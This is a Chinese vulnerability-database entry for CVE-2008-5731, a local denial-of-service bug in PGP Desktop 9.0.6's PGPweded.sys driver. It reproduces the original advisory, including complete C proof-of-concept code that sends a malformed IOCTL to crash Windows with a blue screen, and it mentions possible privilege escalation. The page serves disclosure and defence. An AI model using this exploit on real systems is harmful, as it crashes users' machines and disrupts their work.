PGP Desktop PGPweded.sys驱动本地拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117127 漏洞类型 资源管理错误
发布时间 2008-12-23 更新时间 2009-01-29
CVE编号 CVE-2008-5731 CNNVD-ID CNNVD-200812-455
漏洞平台 Windows CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/7556
https://cxsecurity.com/issue/WLB-2008120054
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-455
|漏洞详情
PGPDesktop是一款强大的加密软件,具备文件、文件夹、邮件、即时通讯等加密功能。PGPDesktop的PGPweded.sys驱动没有正确地过滤用户所提交的IOCTL输入(0x80022038),本地用户可以通过提交恶意请求导致系统蓝屏死机。
|漏洞EXP
--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->


Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Profile: http://evilcry.netsons.org
Website: http://evilfingers.com/

Release Date: 23/12/2008

+-------------------------------------------------+
Product: PGP Desktop 9.0.6 [Build 6060] (other version could be affected)
Affected Component: PGPwded.sys
Category: Local Denial of Service (BSOD)
          (untested) Local Privilege Escalation
+-------------------------------------------------+



--------------------------[Details]--------------->

PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL)
and this lead to a Driver Collapse that propagates on the system with a BSOD.

Affected IOCTL is 0x80022038

+-------------------------------------------------+
 Device Type: Custom Device Type: 0x8002, 32770
 Transfer Type: METHOD_BUFFERED (0x0, 0)
 Access Type: FILE_ANY_ACCESS (0x0, 0)
 Function Code: 0x80E, 2062
+-------------------------------------------------+

From Crash Dump Analysis we obtain a KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e),
could also exists the possibility of a Local Privilege Escalation, but I've not
checked it =)

+--------------------------------------------------------------------------------------------+
/* PGPwded.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 * 
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 *
 */

/* 
Since we had publishing problems, we used spaces between escape < char and the include file as shown here: #include < windows.h >, to compile you have to delete the space.

*/
#include < windows.h >
#include < stdio.h >
#include < stdlib.h >

int main(void)
{
	HANDLE hDevice;	
	DWORD Dummy;	
	
	system("cls");
	printf("\n .:: PGP Enterprise DoS Proof of Concept ::.\n");

	hDevice = CreateFileA("\\\\.\\PGPwdef",
						0,
						FILE_SHARE_READ | FILE_SHARE_WRITE,
						NULL,
						OPEN_EXISTING,
						0,
						NULL);

	if (hDevice == INVALID_HANDLE_VALUE)
	{
		printf("\n Unable to Open PGPwded Device Driver\n");
		return EXIT_FAILURE;
	}

	DeviceIoControl(hDevice, 0x80022038,(LPVOID) 0x80000001, 0, (LPVOID) 0x80000002, 0, &Dummy, (LPOVERLAPPED)NULL);

	return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+



Special Thanks:
To _g_ of orange-bat that developed IOCTL-Proxy a really effective IOCTL Fuzzer
http://www.orange-bat.com/code/ioctl-proxy.zip



Regards,
Giuseppe 'Evilcry' Bonfa'



Disclaimer:
The information in the advisory is believed to be accurate at the time of publishing based 
on currently available information. Use of the information constitutes acceptance for use 
in an AS IS condition. There is no representation or warranties, either express or implied 
by or with respect to anything in this document, and shall not be liable for a ny implied 
warranties of merchantability or fitness for a particular purpose or for any indirect special 
or consequential damages.

# milw0rm.com [2008-12-23]
|参考资料

来源:SECTRACK
名称:1021493
链接:http://www.securitytracker.com/id?1021493
来源:BID
名称:32991
链接:http://www.securityfocus.com/bid/32991
来源:BUGTRAQ
名称:20081223PGPDesktop9.0.6DenialOfService-ZeroDay
链接:http://www.securityfocus.com/archive/1/archive/1/499572/100/0/threaded
来源:MILW0RM
名称:7556
链接:http://www.milw0rm.com/exploits/7556
来源:MISC
链接:http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service_POC.php
来源:MISC
链接:http://www.evilfingers.com/advisory/PGPDesktop_9_0_6_Denial_Of_Service.php
来源:SREASON
名称:4811
链接:http://securityreason.com/securityalert/4811
来源:SECUNIA
名称:33310
链接:http://secunia.com/advisories/33310
来源:OSVDB
名称:50914
链接:http://osvdb.org/50914